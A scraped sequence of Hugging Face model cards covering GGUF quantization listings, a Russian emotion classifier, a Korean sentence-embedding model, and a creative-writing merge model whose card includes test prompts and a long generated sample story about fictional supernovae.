| [GGUF](https://huggingface.co/mradermacher/NOVA-1.5B-Instruct-2-GGUF/resolve/main/NOVA-1.5B-Instruct-2.Q4_K_M.gguf) | Q4_K_M | 1.1 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/NOVA-1.5B-Instruct-2-GGUF/resolve/main/NOVA-1.5B-Instruct-2.Q5_K_S.gguf) | Q5_K_S | 1.2 | |
| [GGUF](https://huggingface.co/mradermacher/NOVA-1.5B-Instruct-2-GGUF/resolve/main/NOVA-1.5B-Instruct-2.Q5_K_M.gguf) | Q5_K_M | 1.2 | |
| [GGUF](https://huggingface.co/mradermacher/NOVA-1.5B-Instruct-2-GGUF/resolve/main/NOVA-1.5B-Instruct-2.Q6_K.gguf) | Q6_K | 1.4 | very good quality |
| [GGUF](https://huggingface.co/mradermacher/NOVA-1.5B-Instruct-2-GGUF/resolve/main/NOVA-1.5B-Instruct-2.Q8_0.gguf) | Q8_0 | 1.7 | fast, best quality |
| [GGUF](https://huggingface.co/mradermacher/NOVA-1.5B-Instruct-2-GGUF/resolve/main/NOVA-1.5B-Instruct-2.f16.gguf) | f16 | 3.2 | 16 bpw, overkill |
Here is a handy graph by ikawrakow comparing some lower-quality quant
types (lower is better):

And here are Artefact2's thoughts on the matter:
https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9
## FAQ / Model Request
See https://huggingface.co/mradermacher/model_requests for some answers to
questions you might have and/or if you want some other model quantized.
## Thanks
I thank my company, [nethype GmbH](https://www.nethype.de/), for letting
me use its servers and providing upgrades to my workstation to enable
this work in my free time.
<!-- end -->
|
mradermacher/H4rmoniousAnthea_V.2-GGUF | mradermacher | "2024-06-03T06:46:21Z" | 3,573 | 0 | transformers | [
"transformers",
"gguf",
"en",
"base_model:neovalle/H4rmoniousAnthea_V.2",
"endpoints_compatible",
"region:us"
] | null | "2024-06-03T05:10:07Z" | ---
base_model: neovalle/H4rmoniousAnthea_V.2
language:
- en
library_name: transformers
quantized_by: mradermacher
tags: []
---
## About
<!-- ### quantize_version: 2 -->
<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: -->
static quants of https://huggingface.co/neovalle/H4rmoniousAnthea_V.2
<!-- provided-files -->
weighted/imatrix quants seem not to be available (by me) at this time. If they do not show up a week or so after the static ones, I have probably not planned for them. Feel free to request them by opening a Community Discussion.
## Usage
If you are unsure how to use GGUF files, refer to one of [TheBloke's
READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for
more details, including on how to concatenate multi-part files.
## Provided Quants
(sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants)
| Link | Type | Size/GB | Notes |
|:-----|:-----|--------:|:------|
| [GGUF](https://huggingface.co/mradermacher/H4rmoniousAnthea_V.2-GGUF/resolve/main/H4rmoniousAnthea_V.2.Q2_K.gguf) | Q2_K | 2.8 | |
| [GGUF](https://huggingface.co/mradermacher/H4rmoniousAnthea_V.2-GGUF/resolve/main/H4rmoniousAnthea_V.2.IQ3_XS.gguf) | IQ3_XS | 3.1 | |
| [GGUF](https://huggingface.co/mradermacher/H4rmoniousAnthea_V.2-GGUF/resolve/main/H4rmoniousAnthea_V.2.Q3_K_S.gguf) | Q3_K_S | 3.3 | |
| [GGUF](https://huggingface.co/mradermacher/H4rmoniousAnthea_V.2-GGUF/resolve/main/H4rmoniousAnthea_V.2.IQ3_S.gguf) | IQ3_S | 3.3 | beats Q3_K* |
| [GGUF](https://huggingface.co/mradermacher/H4rmoniousAnthea_V.2-GGUF/resolve/main/H4rmoniousAnthea_V.2.IQ3_M.gguf) | IQ3_M | 3.4 | |
| [GGUF](https://huggingface.co/mradermacher/H4rmoniousAnthea_V.2-GGUF/resolve/main/H4rmoniousAnthea_V.2.Q3_K_M.gguf) | Q3_K_M | 3.6 | lower quality |
| [GGUF](https://huggingface.co/mradermacher/H4rmoniousAnthea_V.2-GGUF/resolve/main/H4rmoniousAnthea_V.2.Q3_K_L.gguf) | Q3_K_L | 3.9 | |
| [GGUF](https://huggingface.co/mradermacher/H4rmoniousAnthea_V.2-GGUF/resolve/main/H4rmoniousAnthea_V.2.IQ4_XS.gguf) | IQ4_XS | 4.0 | |
| [GGUF](https://huggingface.co/mradermacher/H4rmoniousAnthea_V.2-GGUF/resolve/main/H4rmoniousAnthea_V.2.Q4_K_S.gguf) | Q4_K_S | 4.2 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/H4rmoniousAnthea_V.2-GGUF/resolve/main/H4rmoniousAnthea_V.2.Q4_K_M.gguf) | Q4_K_M | 4.5 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/H4rmoniousAnthea_V.2-GGUF/resolve/main/H4rmoniousAnthea_V.2.Q5_K_S.gguf) | Q5_K_S | 5.1 | |
| [GGUF](https://huggingface.co/mradermacher/H4rmoniousAnthea_V.2-GGUF/resolve/main/H4rmoniousAnthea_V.2.Q5_K_M.gguf) | Q5_K_M | 5.2 | |
| [GGUF](https://huggingface.co/mradermacher/H4rmoniousAnthea_V.2-GGUF/resolve/main/H4rmoniousAnthea_V.2.Q6_K.gguf) | Q6_K | 6.0 | very good quality |
| [GGUF](https://huggingface.co/mradermacher/H4rmoniousAnthea_V.2-GGUF/resolve/main/H4rmoniousAnthea_V.2.Q8_0.gguf) | Q8_0 | 7.8 | fast, best quality |
| [GGUF](https://huggingface.co/mradermacher/H4rmoniousAnthea_V.2-GGUF/resolve/main/H4rmoniousAnthea_V.2.f16.gguf) | f16 | 14.6 | 16 bpw, overkill |
Here is a handy graph by ikawrakow comparing some lower-quality quant
types (lower is better):

And here are Artefact2's thoughts on the matter:
https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9
## FAQ / Model Request
See https://huggingface.co/mradermacher/model_requests for some answers to
questions you might have and/or if you want some other model quantized.
## Thanks
I thank my company, [nethype GmbH](https://www.nethype.de/), for letting
me use its servers and providing upgrades to my workstation to enable
this work in my free time.
<!-- end -->
|
seara/rubert-base-cased-ru-go-emotions | seara | "2023-08-25T19:26:01Z" | 3,569 | 2 | transformers | [
"transformers",
"pytorch",
"safetensors",
"bert",
"text-classification",
"sentiment-analysis",
"multi-label-classification",
"sentiment analysis",
"rubert",
"sentiment",
"russian",
"multilabel",
"classification",
"emotion-classification",
"emotion-recognition",
"emotion",
"ru",
"dataset:seara/ru_go_emotions",
"license:mit",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-classification | "2023-05-02T17:05:52Z" | ---
license: mit
language:
- ru
metrics:
- f1
- roc_auc
- precision
- recall
pipeline_tag: text-classification
tags:
- sentiment-analysis
- multi-label-classification
- sentiment analysis
- rubert
- sentiment
- bert
- russian
- multilabel
- classification
- emotion-classification
- emotion-recognition
- emotion
datasets:
- seara/ru_go_emotions
---
This is [RuBERT](https://huggingface.co/DeepPavlov/rubert-base-cased) model fine-tuned for __emotion classification__ of short __Russian__ texts.
The task is a __multi-label classification__ with the following labels:
```yaml
0: admiration
1: amusement
2: anger
3: annoyance
4: approval
5: caring
6: confusion
7: curiosity
8: desire
9: disappointment
10: disapproval
11: disgust
12: embarrassment
13: excitement
14: fear
15: gratitude
16: grief
17: joy
18: love
19: nervousness
20: optimism
21: pride
22: realization
23: relief
24: remorse
25: sadness
26: surprise
27: neutral
```
Label to Russian label:
```yaml
admiration: восхищение
amusement: веселье
anger: злость
annoyance: раздражение
approval: одобрение
caring: забота
confusion: непонимание
curiosity: любопытство
desire: желание
disappointment: разочарование
disapproval: неодобрение
disgust: отвращение
embarrassment: смущение
excitement: возбуждение
fear: страх
gratitude: признательность
grief: горе
joy: радость
love: любовь
nervousness: нервозность
optimism: оптимизм
pride: гордость
realization: осознание
relief: облегчение
remorse: раскаяние
sadness: грусть
surprise: удивление
neutral: нейтральность
```
## Usage
```python
from transformers import pipeline
model = pipeline(model="seara/rubert-base-cased-ru-go-emotions")
model("Привет, ты мне нравишься!")
# [{'label': 'love', 'score': 0.5456761717796326}]
```
## Dataset
This model was trained on translated GoEmotions dataset called [ru_go_emotions](https://huggingface.co/datasets/seara/ru_go_emotions).
An overview of the training data can be found on [Hugging Face card](https://huggingface.co/datasets/seara/ru_go_emotions) and on
[Github repository](https://github.com/searayeah/ru-goemotions).
## Training
Training were done in this [project](https://github.com/searayeah/bert-russian-sentiment-emotion) with this parameters:
```yaml
tokenizer.max_length: null
batch_size: 32
optimizer: adam
lr: 0.00001
weight_decay: 0
num_epochs: 5
```
## Eval results (on test split)
| |precision|recall|f1-score|auc-roc|support|
|--------------|---------|------|--------|-------|-------|
|admiration |0.66 |0.66 |0.66 |0.93 |504 |
|amusement |0.79 |0.81 |0.8 |0.97 |264 |
|anger |0.53 |0.3 |0.39 |0.91 |198 |
|annoyance |0.0 |0.0 |0.0 |0.82 |320 |
|approval |0.62 |0.25 |0.36 |0.82 |351 |
|caring |0.69 |0.13 |0.22 |0.86 |135 |
|confusion |0.56 |0.18 |0.28 |0.92 |153 |
|curiosity |0.52 |0.4 |0.45 |0.95 |284 |
|desire |0.67 |0.24 |0.35 |0.89 |83 |
|disappointment|0.88 |0.05 |0.09 |0.82 |151 |
|disapproval |0.56 |0.17 |0.26 |0.88 |267 |
|disgust |0.83 |0.2 |0.33 |0.92 |123 |
|embarrassment |0.0 |0.0 |0.0 |0.88 |37 |
|excitement |0.78 |0.14 |0.23 |0.9 |103 |
|fear |0.83 |0.37 |0.51 |0.92 |78 |
|gratitude |0.94 |0.9 |0.92 |0.99 |352 |
|grief |0.0 |0.0 |0.0 |0.72 |6 |
|joy |0.7 |0.4 |0.51 |0.94 |161 |
|love |0.77 |0.81 |0.79 |0.97 |238 |
|nervousness |0.0 |0.0 |0.0 |0.85 |23 |
|optimism |0.66 |0.52 |0.58 |0.92 |186 |
|pride |0.0 |0.0 |0.0 |0.76 |16 |
|realization |0.0 |0.0 |0.0 |0.74 |145 |
|relief |0.0 |0.0 |0.0 |0.72 |11 |
|remorse |0.58 |0.68 |0.63 |0.99 |56 |
|sadness |0.58 |0.44 |0.5 |0.92 |156 |
|surprise |0.62 |0.45 |0.52 |0.91 |141 |
|neutral |0.72 |0.47 |0.57 |0.84 |1787 |
|micro avg |0.7 |0.42 |0.53 |0.94 |6329 |
|macro avg |0.52 |0.31 |0.36 |0.88 |6329 |
|weighted avg |0.63 |0.42 |0.49 |0.88 |6329 |
|
mradermacher/Falcon2-8B-Spanish-GGUF | mradermacher | "2024-06-05T17:44:35Z" | 3,569 | 0 | transformers | [
"transformers",
"gguf",
"mergekit",
"merge",
"es",
"base_model:ssmits/Falcon2-8B-Spanish",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | "2024-06-05T17:16:06Z" | ---
base_model: ssmits/Falcon2-8B-Spanish
language:
- es
library_name: transformers
license: apache-2.0
quantized_by: mradermacher
tags:
- mergekit
- merge
---
## About
<!-- ### quantize_version: 2 -->
<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: -->
static quants of https://huggingface.co/ssmits/Falcon2-8B-Spanish
<!-- provided-files -->
weighted/imatrix quants seem not to be available (by me) at this time. If they do not show up a week or so after the static ones, I have probably not planned for them. Feel free to request them by opening a Community Discussion.
## Usage
If you are unsure how to use GGUF files, refer to one of [TheBloke's
READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for
more details, including on how to concatenate multi-part files.
## Provided Quants
(sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants)
| Link | Type | Size/GB | Notes |
|:-----|:-----|--------:|:------|
| [GGUF](https://huggingface.co/mradermacher/Falcon2-8B-Spanish-GGUF/resolve/main/Falcon2-8B-Spanish.Q2_K.gguf) | Q2_K | 3.3 | |
| [GGUF](https://huggingface.co/mradermacher/Falcon2-8B-Spanish-GGUF/resolve/main/Falcon2-8B-Spanish.IQ3_XS.gguf) | IQ3_XS | 3.7 | |
| [GGUF](https://huggingface.co/mradermacher/Falcon2-8B-Spanish-GGUF/resolve/main/Falcon2-8B-Spanish.IQ3_S.gguf) | IQ3_S | 3.8 | beats Q3_K* |
| [GGUF](https://huggingface.co/mradermacher/Falcon2-8B-Spanish-GGUF/resolve/main/Falcon2-8B-Spanish.Q3_K_S.gguf) | Q3_K_S | 3.8 | |
| [GGUF](https://huggingface.co/mradermacher/Falcon2-8B-Spanish-GGUF/resolve/main/Falcon2-8B-Spanish.IQ3_M.gguf) | IQ3_M | 3.9 | |
| [GGUF](https://huggingface.co/mradermacher/Falcon2-8B-Spanish-GGUF/resolve/main/Falcon2-8B-Spanish.Q3_K_M.gguf) | Q3_K_M | 4.1 | lower quality |
| [GGUF](https://huggingface.co/mradermacher/Falcon2-8B-Spanish-GGUF/resolve/main/Falcon2-8B-Spanish.Q3_K_L.gguf) | Q3_K_L | 4.4 | |
| [GGUF](https://huggingface.co/mradermacher/Falcon2-8B-Spanish-GGUF/resolve/main/Falcon2-8B-Spanish.IQ4_XS.gguf) | IQ4_XS | 4.6 | |
| [GGUF](https://huggingface.co/mradermacher/Falcon2-8B-Spanish-GGUF/resolve/main/Falcon2-8B-Spanish.Q4_K_S.gguf) | Q4_K_S | 4.8 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/Falcon2-8B-Spanish-GGUF/resolve/main/Falcon2-8B-Spanish.Q4_K_M.gguf) | Q4_K_M | 5.1 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/Falcon2-8B-Spanish-GGUF/resolve/main/Falcon2-8B-Spanish.Q5_K_S.gguf) | Q5_K_S | 5.8 | |
| [GGUF](https://huggingface.co/mradermacher/Falcon2-8B-Spanish-GGUF/resolve/main/Falcon2-8B-Spanish.Q5_K_M.gguf) | Q5_K_M | 6.1 | |
| [GGUF](https://huggingface.co/mradermacher/Falcon2-8B-Spanish-GGUF/resolve/main/Falcon2-8B-Spanish.Q6_K.gguf) | Q6_K | 6.8 | very good quality |
| [GGUF](https://huggingface.co/mradermacher/Falcon2-8B-Spanish-GGUF/resolve/main/Falcon2-8B-Spanish.Q8_0.gguf) | Q8_0 | 8.7 | fast, best quality |
| [GGUF](https://huggingface.co/mradermacher/Falcon2-8B-Spanish-GGUF/resolve/main/Falcon2-8B-Spanish.f16.gguf) | f16 | 16.3 | 16 bpw, overkill |
Here is a handy graph by ikawrakow comparing some lower-quality quant
types (lower is better):

And here are Artefact2's thoughts on the matter:
https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9
## FAQ / Model Request
See https://huggingface.co/mradermacher/model_requests for some answers to
questions you might have and/or if you want some other model quantized.
## Thanks
I thank my company, [nethype GmbH](https://www.nethype.de/), for letting
me use its servers and providing upgrades to my workstation to enable
this work in my free time.
<!-- end -->
|
sebdg/puzzle_tools_llama3 | sebdg | "2024-06-26T02:20:56Z" | 3,567 | 0 | transformers | [
"transformers",
"gguf",
"llama",
"text-generation-inference",
"unsloth",
"en",
"base_model:unsloth/llama-3-8b-Instruct-bnb-4bit",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | null | "2024-06-26T00:49:12Z" | ---
base_model: unsloth/llama-3-8b-Instruct-bnb-4bit
language:
- en
license: apache-2.0
tags:
- text-generation-inference
- transformers
- unsloth
- llama
- gguf
---
# Uploaded model
- **Developed by:** sebdg
- **License:** apache-2.0
- **Finetuned from model :** unsloth/llama-3-8b-Instruct-bnb-4bit
This llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
jhgan/ko-sbert-sts | jhgan | "2022-08-16T12:45:38Z" | 3,563 | 7 | sentence-transformers | [
"sentence-transformers",
"pytorch",
"tf",
"bert",
"feature-extraction",
"sentence-similarity",
"transformers",
"endpoints_compatible",
"region:us"
] | sentence-similarity | "2022-03-02T23:29:05Z" | ---
pipeline_tag: sentence-similarity
tags:
- sentence-transformers
- feature-extraction
- sentence-similarity
- transformers
---
# ko-sbert-sts
This is a [sentence-transformers](https://www.SBERT.net) model: It maps sentences & paragraphs to a 768 dimensional dense vector space and can be used for tasks like clustering or semantic search.
<!--- Describe your model here -->
## Usage (Sentence-Transformers)
Using this model becomes easy when you have [sentence-transformers](https://www.SBERT.net) installed:
```
pip install -U sentence-transformers
```
Then you can use the model like this:
```python
from sentence_transformers import SentenceTransformer
sentences = ["안녕하세요?", "한국어 문장 임베딩을 위한 버트 모델입니다."]
model = SentenceTransformer('jhgan/ko-sbert-sts')
embeddings = model.encode(sentences)
print(embeddings)
```
## Usage (HuggingFace Transformers)
Without [sentence-transformers](https://www.SBERT.net), you can use the model like this: First, you pass your input through the transformer model, then you have to apply the right pooling-operation on-top of the contextualized word embeddings.
```python
from transformers import AutoTokenizer, AutoModel
import torch
#Mean Pooling - Take attention mask into account for correct averaging
def mean_pooling(model_output, attention_mask):
token_embeddings = model_output[0] #First element of model_output contains all token embeddings
input_mask_expanded = attention_mask.unsqueeze(-1).expand(token_embeddings.size()).float()
return torch.sum(token_embeddings * input_mask_expanded, 1) / torch.clamp(input_mask_expanded.sum(1), min=1e-9)
# Sentences we want sentence embeddings for
sentences = ['This is an example sentence', 'Each sentence is converted']
# Load model from HuggingFace Hub
tokenizer = AutoTokenizer.from_pretrained('jhgan/ko-sbert-sts')
model = AutoModel.from_pretrained('jhgan/ko-sbert-sts')
# Tokenize sentences
encoded_input = tokenizer(sentences, padding=True, truncation=True, return_tensors='pt')
# Compute token embeddings
with torch.no_grad():
model_output = model(**encoded_input)
# Perform pooling. In this case, mean pooling.
sentence_embeddings = mean_pooling(model_output, encoded_input['attention_mask'])
print("Sentence embeddings:")
print(sentence_embeddings)
```
## Evaluation Results
<!--- Describe how your model was evaluated -->
KorSTS 학습 데이터셋으로 학습한 후 KorSTS 평가 데이터셋으로 평가한 결과입니다.
- Cosine Pearson: 81.55
- Cosine Spearman: 81.23
- Euclidean Pearson: 79.94
- Euclidean Spearman: 79.79
- Manhattan Pearson: 79.90
- Manhattan Spearman: 79.75
- Dot Pearson: 76.02
- Dot Spearman: 75.31
## Training
The model was trained with the parameters:
**DataLoader**:
`torch.utils.data.dataloader.DataLoader` of length 719 with parameters:
```
{'batch_size': 8, 'sampler': 'torch.utils.data.sampler.RandomSampler', 'batch_sampler': 'torch.utils.data.sampler.BatchSampler'}
```
**Loss**:
`sentence_transformers.losses.CosineSimilarityLoss.CosineSimilarityLoss`
Parameters of the fit()-Method:
```
{
"epochs": 5,
"evaluation_steps": 1000,
"evaluator": "sentence_transformers.evaluation.EmbeddingSimilarityEvaluator.EmbeddingSimilarityEvaluator",
"max_grad_norm": 1,
"optimizer_class": "<class 'transformers.optimization.AdamW'>",
"optimizer_params": {
"lr": 2e-05
},
"scheduler": "WarmupLinear",
"steps_per_epoch": null,
"warmup_steps": 360,
"weight_decay": 0.01
}
```
## Full Model Architecture
```
SentenceTransformer(
(0): Transformer({'max_seq_length': 128, 'do_lower_case': False}) with Transformer model: BertModel
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False})
)
```
## Citing & Authors
<!--- Describe where people can find more information -->
- Ham, J., Choe, Y. J., Park, K., Choi, I., & Soh, H. (2020). Kornli and korsts: New benchmark datasets for korean natural language understanding. arXiv
preprint arXiv:2004.03289
- Reimers, Nils and Iryna Gurevych. “Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks.” ArXiv abs/1908.10084 (2019)
- Reimers, Nils and Iryna Gurevych. “Making Monolingual Sentence Embeddings Multilingual Using Knowledge Distillation.” EMNLP (2020)
|
DavidAU/TieFighter-Holodeck-Holomax-Mythomax-F1-V1-COMPOS-20B-gguf | DavidAU | "2024-05-25T02:04:36Z" | 3,563 | 1 | null | [
"gguf",
"not-for-all-audiences",
"art",
"creative",
"roleplay",
"story",
"fiction",
"scene writing",
"composite model",
"merge-kit",
"unpredictable",
"en",
"license:apache-2.0",
"region:us"
] | null | "2024-05-18T00:04:35Z" | ---
license: apache-2.0
language:
- en
tags:
- not-for-all-audiences
- art
- creative
- roleplay
- story
- fiction
- scene writing
- composite model
- merge-kit
- unpredictable
---
<B>Creative, Brainstorming, Roleplay, Long Form, Story, Scene, And Fiction Generation:
Model Version 1, Formula 1</B>
Breaking the Predictive Path.
<img src="tie-wild.jpg">
This model is a mixture of 4 highly creative models using a very different form of merging: composite.
This model EXCELS in long form [often exceeding 1500 tokens - without being told to do so], highly creative output with a minimum of input.
(see samples below)
In testing its output almost reaches "Hitch Hikers to the Galaxy" level prose.
It makes up words, societies, worlds, excuses, has a sense of humour and can be lightly sarcastic and
even "self-aware" (of its own prose's folly) and it goes and goes and ...... GGOOOOEEEESSSSS.....
It is wildly unpredictable and verbose.
It does swear on occasion, and sometimes uses: @#$ in place of swear words.
The model was formed by using layers from each model using a formula, rather than using "math" to merge them together.
The reason for this is after a lot of tests the "regular merging" methods resulted in too much loss of unique attributes of each model.
This is also an upscale too as the original models were 13B parameters each.
Part of the upscale it to allow room to integrate the models together as well as give it "room to stretch it's legs" so to speak.
More layers = more complex output, reasoning and so on.
The result is a 20B parameter model with one main brain and 3 sub-brains all working intermeshed together.
The goal of this project was to disrupt the predictability of the final model just enough to change the creativity of it,
while keeping it "sane" and not subject to err... crashing, exploding... you know the rest.
In other words: Inject the Ghost into the Machine.
This took a lot of applied theory, and trial and error to create this model primarily to make it usable and stable.
As of this writing there are 5 working formulas to do this, with various offshoots of these too.
As of this date further testing is required to see if these formulas/methods can be applied to other models and/or
other merges and/or larger more complex merges [next steps].
Version 1 refers to the actual mix of the models themselves.
Currently there are 4 main mixes available with 4 different permutations each.
Not clear if or when these will be uploaded as they are still undergoing testing.
There are also additional versions of "version 1" using the different formulas.
Same as above... more testing to go.
There are some examples below, as well as methods you can use the get the most out of this model.
and many of these methods can be applied to all other models too.
First though, model credits to the model creators:
https://huggingface.co/KoboldAI/LLaMA2-13B-Tiefighter
https://huggingface.co/KoboldAI/LLAMA2-13B-Holodeck-1
https://huggingface.co/KoboldAI/LLaMA2-13B-Holomax
https://huggingface.co/Gryphe/MythoMax-L2-13b
These people deserve the love and support hands down.
And special thanks to:
Mergekit - Multiple Model Merging Automation [free]:
https://github.com/arcee-ai/mergekit
LLAMACPP - Create and run LLMs [free]:
https://github.com/ggerganov/llama.cpp
LMSTUDIO - Discover, download, and run local LLMs [free]:
https://lmstudio.ai/
WEB UI: GGUF, GPTQ, EXL2, Transformers, Roleplay [free]
https://github.com/oobabooga/text-generation-webui
KOBOLD-AI: AI, Roleplay, Adventure, Story [free]:
https://github.com/LostRuins/koboldcpp
FARADAY.dev / Backyard AI: Roleplay [free]
https://backyard.ai/desktop
For without you and your endless verve this project would not have been possible.
All of these are multi platform - Windows, Mac, Linux etc etc.
If you are looking for more UIs, interfaces and methods to run GGUF models
see the LLAMACPP site's main page (about 1/4 down).
++++++++++++++++++++++++++++++++++++++++++
<B>THIS REPO:</B>
++++++++++++++++++++++++++++++++++++++++++
All the GGUF quants for both regular (8) and Imatrix (22) denoted by "imat" are located here.
Due to the nature of this specific model it is suggested to download a number of different versions.
See below.
++++++++++++++++++++++++++++++++++++++++++
<B>TEST PROMPTS:</B>
++++++++++++++++++++++++++++++++++++++++++
TEST with "TEMP:0, CTX:2048*" / "TEMP:.8 , CTX:2048*"
(the model may exceed this context level)
(* this is NOT maximum context, see model notes below)
These prompts have no right answer and therefore perfect for testing a creative model.
1:
Give me 3 fictional reasons a sun went supernova of 500 words for each reason.
2:
The skyscraper swayed, as she watched the window in front of her on the 21 floor explode.
3:
Using the following "story idea" below, write the first scene in the novel introducing the young woman. This scene should start in the middle of the action, include dialog, vivid passages, and end on a cliffhanger relevant to the story idea but it should also be unexpected. The scene should be 1000 words long and escalate in conflict and suspense and be written in first person, present tense with the point of view character being the young woman.
Story idea:
In a world ruled by dictatorship, a rebel young woman leads a rebellion against the system. Despite the risks, she fights to overthrow the dictator and restore democracy to her country. The government executes her for treason, but she sticks to her beliefs and is responsible for starting the revolution.
++++++++++++++++++++++++++++
<B>EXAMPLE 1:</B>
++++++++++++++++++++++++++++
(q4km - non imatrix, set at TEMP 0 (see why below))
Q: Give me 3 fictional reasons a sun went supernova of 500 word for each reason.
AI:
Reason 1: Sol's Vengeance
Sol was not always known as the life-giver it is today. Once upon a time, it was a red dwarf star known as Sol III B. It had seven planets revolving around it, teeming with life. However, one day, an interstellar cloud of gas and dust passed too close to the solar system. The gravitational pull on the gas giant in the habitable zone, named Nibiru after the Sumerian god of the seafloor, was so strong that it began to tear apart its own moon.
The moon's debris field, the size of a small planetoid, hurtled towards Sol III B at a significant percentage of the speed of light. Sol had no way of knowing what was coming. It was caught off guard when the projectile slammed into its photosphere with the force of a billion supernovas combined.
The impact released more energy in a fraction of a second than Sol III B would have given off in its entire lifespan as a red dwarf star. The shockwave from the explosion was so powerful that it ripped apart the outer layers of the star, vaporizing them instantly and creating a supernova.
As the fire consumed Sol III B from the inside out, the remaining planets were engulfed in the blistering heat. Life on each world perished as the atmosphere was stripped away by the searing radiation. The surviving debris field coalesced under its own gravity, forming a new star known as Sol I A.
Centuries later, after the newly formed red dwarf had had time to cool and regain its composure, it began to attract a new assortment of planets, moons, and other celestial debris. Life returned to the newly reborn solar system, unaware of what had happened here before.
Sol I A, now known simply as Sol, swore vengeance on the unseen hand that had destroyed its twin so cruelly. It vowed revenge on whoever or whatever had committed this atrocity against it and its family. Sol bided its time, waiting...
*Cue ominous music*
Reason 2: The Curse of Xolotl
In the heart of the Orion Arm, there lay a system known as Xolotl. It was a peaceful place, teaming with life. At its center burned a yellow dwarf star named for the Aztec god of oblivion. Life teemed on and around the worlds that orbited it: Xolotl A I, II A, III B, IV C...
The ninth planet in the system was known as Xolotl IX Delta. It was a barren, tectonically active world covered in perpetual storms of fire and lightning. Life had never managed to gain a foothold there, but that didn't stop the inhabitants of the other planets from visiting it occasionally for their own reasons.
The indigenous lifeforms on Xolotl III B worshipped a pantheon of benevolent deities who were said to have created them in Their image. They lived in peace and harmony, unaware of the malevolence that lurked beyond their world.
One day, a group of intrepid explorers from Xolotl III B bravely set out on a journey to explore the ninth planet. Curiosity was a powerful force, stronger than even the wrath of their gods. Upon reaching the surface of Xolotl IX Delta, they were struck with awe at the raw power and beauty of the world around them.
They built shrines to their benevolent deities on top of extinct volcanoes, offering sacrifices in supplication for continued safety and prosperity. Unbeknownst to them, they had awakened an ancient evil that had been slumbering deep within the planet's core for millennia.
The heart of Xolotl IX Delta was a massive black hole, warped space-time itself. Legends spoke of it as the eye of the great serpent, which circled the world eternally, consuming lesser stars and planets in its endless hunger. The explorers had awakened it from its eons-long slumber, and now there was no going back.
The black hole began to feed on the energy of Xolotl III B and its sun, sucking the life out of the system like a parasite. Sol I A tried desperately to break free of the gravitational death-grip of the monstrous singularity, but it was no use. Slowly but inexorably, the other planets were drawn inexorably towards their doom as well.
Sol I A put up a valiant fight, but in the end, even stars could only burn for so long. The black hole consumed everything around it, reducing the once-thriving system to a sea of searing gas and swirling space dust. Sol itself was no exception. In the end, the very star that had given life to countless worlds and untold numbers of sentient beings became fuel for the ravenous maw of the cosmic monster it had unwittingly awoken.
And so Sol I A, known as Sol to its new tenants, met the same end as its twin: a spectacular supernova that lit up the night sky like a thousand suns, outshining its own brilliance in its final act of defiance against the malevolent force that had doomed them all.
*Cue ominous music*
Reason 3: The Curse of Xenocide
In a distant arm of the universe, there lay a system known as Xenocide. It was named for the atrocity that had occurred there long ago, during the days of the first interstellar empires. Life had come to this corner of the cosmos on the winds of chance, drifting on the currents of space-time like so much flotsam and jetsam.
The system was home to seven worlds, each teeming with life in its own unique key: Xenocide I A, II B, III G... IX Delta. The sevenths were twins, so similar that even the most discerning eye would have trouble telling them apart from a distance.
The two planets orbited their sun in perfect synchronicity, one side perpetually bathed in light and heat while the other was engulfed in perpetual night. Life had evolved differently on each world, but only in the finer details. The beings that scampered and soared across the surface of Xenocide VII A were physically indistinguishishable from their counterparts on Xenocide VII B...
Until the day the first interstellar empire arrived.
The empire had been expanding at a rate faster than even life itself for millennia, devouring worlds and civilizations like a ravenous beast. They had come upon Xenocide by chance, drawn here by rumors of a world-devouring god-beast said to dwell in the system's star-heart.
Curiosity was a powerful motivator, stronger than even the fear of the unknown. The empire sent a small scouting fleet to investigate, hoping to either prove or disprove the rumors once and for all.
The scouts found a world as beautiful as it was peaceful. They landed on Xenocide VII A, beaming down images of a paradise world teeming with life to their waiting flagship in orbit. The images were so breathtakingly beautiful that the empire's rulers knew they had found a new prize to add to their already impressive trophy collection.
The scouts beamed back a single message: "Found them, majesty. Life as we know it."
With that, the empire struck.
Wave after wave of warships descended upon Xenocide VII A, unleashing firepower so devastating that the world itself was reduced to molten slag in mere instants. The atmosphere boiled away in an atmosphere of flame and ash, leaving the surface of the once-lush world as barren and lifeless as the airless face of the moon.
Meanwhile, on its twin world in the grip of perpetual night, the inhabitants of Xenocide VII B were blissfully unaware of the doom that had just claimed their near-twin. They continued to live out their lives, unaware of the storm cloud of death that was gathering on the horizon.
*Cue ominous music*
Sol IA, still known as Sol to its new tenants, circled the blackened husk of Xenocide VII A for untold years. It watched as the debris field from the destroyed worlds and the remains of the empire's warships drifted away on the photon currents like space-faring flotsam and jetsam.
Centuries passed, millennu, eons, while Sol orbited the cold, lifeless husk of what had once been its twin world. And as it circled, a thought gnawed at the back of its star-heart like a parasitic worm: vengeance.
